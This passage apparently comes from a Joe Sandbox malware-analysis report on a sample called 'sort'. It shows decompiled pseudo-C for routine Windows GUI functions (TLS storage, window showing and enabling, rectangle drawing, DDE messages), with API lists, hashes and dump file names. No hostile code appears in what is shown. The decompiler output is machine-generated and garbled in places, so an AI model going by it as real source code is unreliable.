				void* _t33;
				void* _t39;
				signed int* _t45;
				void* _t58;
				long* _t61;

				_push(__ecx);
				_t61 = __ecx;
				_t58 = TlsGetValue( *__ecx);
				if(_t58 == 0) {
					_t28 = E00425860(0x10);
					if(_t28 == 0) {
						_t58 = 0;
					} else {
						 *_t28 = 0x42e2ac;
						_t58 = _t28;
					}
					 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
					 *(_t58 + 0xc) =  *(_t58 + 0xc) & 0x00000000;
					_t8 = _t58 + 8; // 0x8
					_t45 = _t8;
					_t9 =  &(_t61[7]); // 0x4399c8
					_v8 = _t58;
					EnterCriticalSection(_t9);
					_t11 =  &(_t61[5]); // 0x4399c0
					_t48 = _t11;
					E00425807(_t11, _t58);
					_t12 =  &(_t61[7]); // 0x4399c8
					LeaveCriticalSection(_t12);
					goto L8;
				} else {
					_t2 = _t58 + 8; // 0x8
					_t45 = _t2;
					if(_a4 >=  *_t45 && _a8 != 0) {
						L8:
						_t32 =  *(_t58 + 0xc);
						if(_t32 != 0) {
							_t15 =  &(_t61[3]); // 0x4
							_t48 =  *_t15 << 2;
							_t33 = LocalReAlloc(_t32,  *_t15 << 2, 2);
						} else {
							_t14 =  &(_t61[3]); // 0x4
							_t33 = LocalAlloc(0,  *_t14 << 2);
						}
						 *(_t58 + 0xc) = _t33;
						if(_t33 == 0) {
							E0041007F(_t48);
						}
						_t17 =  &(_t61[3]); // 0x4
						E00406330( *(_t58 + 0xc) +  *_t45 * 4, 0,  *_t45 * 0x3fffffff +  *_t17 << 2);
						_t21 =  &(_t61[3]); // 0x4
						 *_t45 =  *_t21;
						TlsSetValue( *_t61, _t58);
					}
				}
				_t39 =  *(_t58 + 0xc);
				 *((intOrPtr*)(_t39 + _a4 * 4)) = _a8;
				return _t39;
			}

APIs

TlsGetValue.KERNEL32(004399AC,004397CC,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AA5
EnterCriticalSection.KERNEL32(004399C8,00000010,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AF4
LeaveCriticalSection.KERNEL32(004399C8,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B07
LocalAlloc.KERNEL32(00000000,00000004,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B1D
LocalReAlloc.KERNEL32(?,00000004,00000002,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B2F
TlsSetValue.KERNEL32(004399AC,00000000), ref: 00425B6B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
Instruction ID: c57f163ce3b349da1c9d5fe6ec490a1136d0d73abae7d2378efdd78ccfe309f5
Opcode Fuzzy Hash: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
Instruction Fuzzy Hash: 96318031200A15EFD724DF15E88AE6AB7B8FF44354F80C66AE416C7650E774F815CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041445E, Relevance: 9.1, APIs: 6, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0041445E(intOrPtr* __ecx, void* __edi) {
				struct HWND__* _t33;
				int _t35;
				void* _t37;
				void* _t52;
				void* _t53;
				intOrPtr* _t57;
				void* _t58;
				void* _t60;

				_t53 = __edi;
				E00406520(E00429E3C, _t60);
				_push(__ecx);
				_t57 = __ecx;
				 *((intOrPtr*)(_t60 - 0x10)) =  *((intOrPtr*)(E00424BFB() + 4));
				E00424BFB();
				E00412F19();
				 *(_t60 - 4) = 0;
				if( *((intOrPtr*)( *_t57 + 0xb0))() != 0) {
					 *((intOrPtr*)( *_t57 + 0xf0))();
				}
				_push(_t53);
				SendMessageA( *(_t57 + 0x1c), 0x1f, 0, 0);
				E00414E86(_t52,  *(_t57 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t48 = _t57;
				_t58 = E00414CEF(_t57);
				SendMessageA( *(_t58 + 0x1c), 0x1f, 0, 0);
				E00414E86(_t52,  *(_t58 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t33 = GetCapture();
				if(_t33 != 0) {
					SendMessageA(_t33, 0x1f, 0, 0);
				}
				_t35 = WinHelpA( *(_t58 + 0x1c),  *( *((intOrPtr*)(_t60 - 0x10)) + 0x8c),  *(_t60 + 0xc),  *(_t60 + 8));
				_t65 = _t35;
				if(_t35 == 0) {
					_push(0xffffffff);
					_push(0);
					_push(0xf107);
					E0041BB7E(_t48, _t65);
				}
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				E00424BFB();
				_t37 = E00412F2E();
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
				return _t37;
			}

APIs

__EH_prolog.LIBCMT ref: 00414463
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004144B0
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004144D2
GetCapture.USER32 ref: 004144E4
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004144F3
WinHelpA.USER32 ref: 00414507

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
Instruction ID: 80e039248a87347babf29178317820bee1b7ca75e73936699edc63578028a574
Opcode Fuzzy Hash: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
Instruction Fuzzy Hash: 15219571300205BFEB20AF65DC89FAA7BA9FF44754F118129F245971E2CBB4DC419B64

Uniqueness

Uniqueness Score: -1.00%

Function 004232C5, Relevance: 9.1, APIs: 6, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004232C5(intOrPtr _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16, struct HBRUSH__* _a20) {
				struct tagRECT _v20;
				struct HBRUSH__* _t46;
				long _t50;
				struct HBRUSH__* _t52;
				intOrPtr _t59;
				struct HBRUSH__* _t60;
				long _t64;
				struct HBRUSH__* _t66;
				intOrPtr _t70;
				intOrPtr _t72;

				CopyRect( &_v20, _a8);
				_v20.right = _v20.left + _a12;
				_t46 = _a20;
				if(_t46 != 0) {
					_t46 =  *(_t46 + 4);
				}
				_t72 = _a4;
				FillRect( *(_t72 + 4),  &_v20, _t46);
				_t50 = _a8->right;
				_v20.right = _t50;
				_v20.left = _t50 - _a12;
				_t52 = _a20;
				if(_t52 != 0) {
					_t52 =  *(_t52 + 4);
				}
				FillRect( *(_t72 + 4),  &_v20, _t52);
				CopyRect( &_v20, _a8);
				_t70 = _a16;
				_v20.bottom = _v20.top + _t70;
				_t59 = _a12;
				_v20.left = _v20.left + _t59;
				_v20.right = _v20.right - _t59;
				_t60 = _a20;
				if(_t60 != 0) {
					_t60 =  *(_t60 + 4);
				}
				FillRect( *(_t72 + 4),  &_v20, _t60);
				_t64 = _a8->bottom;
				_v20.bottom = _t64;
				_v20.top = _t64 - _t70;
				_t66 = _a20;
				if(_t66 != 0) {
					_t66 =  *(_t66 + 4);
				}
				return FillRect( *(_t72 + 4),  &_v20, _t66);
			}

APIs

CopyRect.USER32 ref: 004232DB
FillRect.USER32 ref: 00423303
FillRect.USER32 ref: 00423326
CopyRect.USER32 ref: 0042332F
FillRect.USER32 ref: 00423357
FillRect.USER32 ref: 00423379

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$Fill$Copy
String ID:
API String ID: 4194453840-0
Opcode ID: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
Instruction ID: dd711018ace7994bf7c1ba7351bcb303de77ebc25f490cf6722cdbc4bd81ee43
Opcode Fuzzy Hash: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
Instruction Fuzzy Hash: EB319A75A0011AAFCF00DFA9CD85DAEBBF8FF08354B488566B914D7211D730EA14DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD49, Relevance: 9.1, APIs: 6, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041CD49(void* __ecx, void* __eflags) {
				void* _t57;
				void* _t75;
				void* _t77;

				E00406520(E0042A90C, _t77);
				_t75 = __ecx;
				_push(__ecx);
				E0041A41D(_t77 - 0x40, __eflags);
				 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
				GetClientRect( *(__ecx + 0x1c), _t77 - 0x2c);
				GetWindowRect( *(_t75 + 0x1c), _t77 - 0x1c);
				E0041A2F1(_t75, _t77 - 0x1c);
				OffsetRect(_t77 - 0x2c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E0041A13B(_t77 - 0x40, _t77 - 0x2c);
				OffsetRect(_t77 - 0x1c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E0041F306(_t75, _t77 - 0x40, _t77 - 0x1c);
				E0041A17D(_t77 - 0x40, _t77 - 0x1c);
				SendMessageA( *(_t75 + 0x1c), 0x14,  *(_t77 - 0x3c), 0);
				E0041F4B4(_t75, _t77 - 0x40, _t77 - 0x1c);
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				_t57 = E0041A48F(_t77 - 0x40);
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t57;
			}

APIs

__EH_prolog.LIBCMT ref: 0041EE8E

Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B

GetClientRect.USER32 ref: 0041EEAE
GetWindowRect.USER32 ref: 0041EEBB

Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E

OffsetRect.USER32(?,?,?), ref: 0041EEE2

Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A160
Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A175

OffsetRect.USER32(?,?,?), ref: 0041EF00

Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1A2
Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1B7

SendMessageA.USER32(?,00000014,?,00000000), ref: 0041EF27

Part of subcall function 0041A48F: __EH_prolog.LIBCMT ref: 0041A494
Part of subcall function 0041A48F: ReleaseDC.USER32 ref: 0041A4B3

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$Clip$ClientH_prolog$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
String ID:
API String ID: 2727942566-0
Opcode ID: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
Instruction ID: 5eac70104d705e6b181efe7a53c40368cdb347892f906ea361a41ca3bb60cced
Opcode Fuzzy Hash: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
Instruction Fuzzy Hash: 0721DBB1D0011EABCF15EBA5DC49DEEB77CEB44314F00412AE512E3191DB78A94ACB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDC7, Relevance: 9.1, APIs: 6, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041BDC7(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				struct tagRECT _v36;
				struct HDC__* _v48;
				struct HDC__* _v52;
				char _v56;
				struct tagTEXTMETRICA _v112;
				void* __ebp;
				void* _t28;
				int _t38;
				intOrPtr* _t43;
				intOrPtr _t55;
				intOrPtr* _t56;
				intOrPtr _t57;

				_t56 = __ecx;
				_push(0);
				E0041A369( &_v56, __eflags);
				_t28 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_v8 = 0;
				if(_t28 != 0) {
					_v8 = SelectObject(_v52, _t28);
				}
				GetTextMetricsA(_v48,  &_v112);
				_t63 = _v8;
				if(_v8 != 0) {
					SelectObject(_v52, _v8);
				}
				E0041A3DB( &_v56);
				SetRectEmpty( &_v36);
				E00424F9B(_t56, _t63,  &_v36, _a12);
				 *((intOrPtr*)( *_t56 + 0xa0))(0x407, 0,  &_v20);
				_t38 = GetSystemMetrics(6);
				_t57 =  *((intOrPtr*)(_t56 + 0x78));
				_t55 = (_t38 + _v16 << 1) - _v36.bottom - _v36.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
				if(_t55 < _t57) {
					_t55 = _t57;
				}
				_t43 = _a4;
				 *_t43 = 0x7fff;
				 *((intOrPtr*)(_t43 + 4)) = _t55;
				return _t43;
			}

APIs

Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397

SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041BDE4
SelectObject.GDI32(?,00000000), ref: 0041BDFB
GetTextMetricsA.GDI32(?,?), ref: 0041BE07
SelectObject.GDI32(?,?), ref: 0041BE18
SetRectEmpty.USER32(?), ref: 0041BE26
GetSystemMetrics.USER32 ref: 0041BE5B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MetricsObjectSelect$EmptyH_prologMessageRectSendSystemText
String ID:
API String ID: 1789613188-0
Opcode ID: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
Instruction ID: 4a213af7df46fba370d1b0da78e664596150d00b2e67ee82928ccd15ad32fd7f
Opcode Fuzzy Hash: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
Instruction Fuzzy Hash: 5E214C72A00219EFCF00DFA4DC88CEEBBBAFF48304B54402AE502A7250DB346E51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBD7, Relevance: 9.1, APIs: 6, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BBD7(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t6;
				void* _t12;
				struct HWND__** _t14;
				struct HWND__* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t17 = _a4;
				_t16 = _t17;
				if(_t17 != 0) {
					L16:
					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {
						L4:
						_t15 = _t16;
						_t6 = _t16;
						if(_t16 == 0) {
							L6:
							if(_t17 == 0 && _t16 != 0) {
								_t16 = GetLastActivePopup(_t16);
							}
							_t14 = _a8;
							if(_t14 != 0) {
								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {
									 *_t14 =  *_t14 & 0x00000000;
								} else {
									 *_t14 = _t15;
									EnableWindow(_t15, 0);
								}
							}
							return _t16;
						} else {
							goto L5;
						}
						do {
							L5:
							_t15 = _t6;
							_t6 = GetParent(_t6);
						} while (_t6 != 0);
						goto L6;
					}
					_t16 = GetParent(_t16);
					L15:
					if(_t16 == 0) {
						goto L4;
					}
					goto L16;
				}
				_t12 = E0041BC73();
				if(_t12 != 0) {
					L14:
					_t16 =  *(_t12 + 0x1c);
					goto L15;
				}
				_t12 = E00404DAE();
				if(_t12 != 0) {
					goto L14;
				}
				_t16 = 0;
				goto L4;
			}

APIs

GetParent.USER32(?), ref: 0041BC0A
GetLastActivePopup.USER32(?), ref: 0041BC19
IsWindowEnabled.USER32(?), ref: 0041BC2E
EnableWindow.USER32(?,00000000), ref: 0041BC41
GetWindowLongA.USER32 ref: 0041BC53
GetParent.USER32(?), ref: 0041BC61

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
Instruction ID: 79cfeeef415f6b616a2a8b62cc4a1a68cb8ced5d87a6c48b433ad5091e6d0582
Opcode Fuzzy Hash: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
Instruction Fuzzy Hash: 5F119E327012216B86312A6A9C84BABB398DF94B54F09052FEC00E7314FF28DC8242ED

Uniqueness

Uniqueness Score: -1.00%

Function 00420A8B, Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420A8B(intOrPtr _a4) {
				intOrPtr _v4;
				struct HWND__* _t15;
				struct HWND__* _t17;
				signed int _t21;
				intOrPtr _t28;
				void* _t30;
				struct HWND__* _t32;

				_v4 = _t28;
				_t15 = GetWindow(GetDesktopWindow(), 5);
				_t32 = _t15;
				if(_t32 == 0) {
					return _t15;
				} else {
					while(1) {
						_push(_t32);
						_t30 = E00413767();
						if(_t30 != 0) {
							_t19 =  *((intOrPtr*)(_v4 + 0x1c));
							if( *((intOrPtr*)(_v4 + 0x1c)) != _t32 && E004208E0(_t19, _t32) != 0) {
								_t21 = GetWindowLongA(_t32, 0xfffffff0);
								if(_a4 != 0) {
									if((_t21 & 0x18000000) == 0 && ( *(_t30 + 0x24) & 0x00000002) != 0) {
										ShowWindow(_t32, 4);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) & 0xfffffffd;
									}
								} else {
									if((_t21 & 0x18000000) == 0x10000000) {
										ShowWindow(_t32, 0);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) | 0x00000002;
									}
								}
							}
						}
						_t17 = GetWindow(_t32, 2);
						_t32 = _t17;
						if(_t32 == 0) {
							return _t17;
						}
					}
				}
			}

APIs

GetDesktopWindow.USER32 ref: 00420A94
GetWindow.USER32(00000000), ref: 00420AA1
GetWindowLongA.USER32 ref: 00420AD6
ShowWindow.USER32(00000000,00000000), ref: 00420AF2
ShowWindow.USER32(00000000,00000004), ref: 00420B0A
GetWindow.USER32(00000000,00000002), ref: 00420B13

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
Instruction ID: 7b09bf3e44239edb134f584a809b554a06cce84e6abb4a59c0b4e2be1682ca92
Opcode Fuzzy Hash: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
Instruction Fuzzy Hash: 5F11C27170173926D2319664AC49F1FBBDC9F51768FD00616FA10A3286DBACE84186AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042986F, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042986F(void* __ecx) {
				int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				int _t14;

				_push(__ecx);
				_push(__ecx);
				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
				_v8 = _t14;
				E004298F1(__ecx,  &_v12);
				SetMapMode( *(__ecx + 4), 1);
				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
				return E004296EA(_t14, __ecx, 0, 0);
			}

0x00429872
0x00429873
0x00429884
0x0042988f
0x00429898
0x0042989b
0x004298a5
0x004298b3
0x004298c3
0x004298de
0x004298f0

APIs

GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
GetDeviceCaps.GDI32(?,00000008), ref: 0042988D

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

SetMapMode.GDI32(?,00000001), ref: 004298A5
SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE

Part of subcall function 004296EA: GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
Part of subcall function 004296EA: GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,00000058), ref: 00429779
Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
Part of subcall function 004296EA: SetMapMode.GDI32(00000000,00000008), ref: 004297BC
Part of subcall function 004296EA: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
Part of subcall function 004296EA: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
String ID:
API String ID: 1729379761-0
Opcode ID: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
Instruction ID: ffdc988b3e99ab10a3d87d522c915a36f24d74d83ef75783a8118d4b02154ef1
Opcode Fuzzy Hash: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
Instruction Fuzzy Hash: 10012D31600204BFDB315B56DC4AD5BBFB9EF89B20B40462DF166921A0DB71AD11DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004215FF, Relevance: 9.1, APIs: 6, Instructions: 53
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E004215FF(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
				void* _v8;
				char _v12;
				char _v532;
				void* __ebp;
				long _t19;
				void* _t23;
				void* _t27;

				_push( &_v8);
				_push( &_v12);
				_push(_a8);
				_t27 = __ecx;
				_push(0x3e8);
				L0040C37C();
				lstrcpynA( &_v532, GlobalLock(_v8), 0x208);
				_t19 = GlobalUnlock(_v8);
				_push(_v8);
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push(_a8);
				L0040C376();
				PostMessageA(_a4, 0x3e4,  *(_t27 + 0x1c), _t19);
				if(E004166B3(_t27) != 0) {
					_t23 = E00424BFB();
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 4)))) + 0x94))( &_v532);
				}
				return 0;
			}

APIs

UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0042161E
GlobalLock.KERNEL32 ref: 00421626
lstrcpynA.KERNEL32(?,00000000,00000208), ref: 00421639
GlobalUnlock.KERNEL32(?), ref: 00421642
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0042165A
PostMessageA.USER32 ref: 00421667

Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
String ID:
API String ID: 2333435275-0
Opcode ID: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
Instruction ID: 4c25832e6e6faa34b872796a1f01560d3fa617591b77e043d0f58556844ee018
Opcode Fuzzy Hash: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
Instruction Fuzzy Hash: 86018436600108FFDB11ABA1DC89EDF7BBDEF58304F004175B909E6161DB349E559BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A8B4, Relevance: 9.0, APIs: 6, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A8B4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t7;
				struct HWND__* _t9;
				struct HWND__* _t11;

				_t3 = GetFocus();
				_t11 = _t3;
				if(_t11 != 0) {
					_t9 = _a4;
					if(_t11 != _t9) {
						if(E0041A759(_t11, 3) != 0) {
							L5:
							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
								L8:
								return SendMessageA(_t11, 0x14f, 0, 0);
							}
							_t7 = GetParent(_t9);
							_t3 = GetDesktopWindow();
							if(_t7 != _t3) {
								goto L8;
							}
						} else {
							_t3 = GetParent(_t11);
							_t11 = _t3;
							if(_t11 != _t9) {
								_t3 = E0041A759(_t11, 2);
								if(_t3 != 0) {
									goto L5;
								}
							}
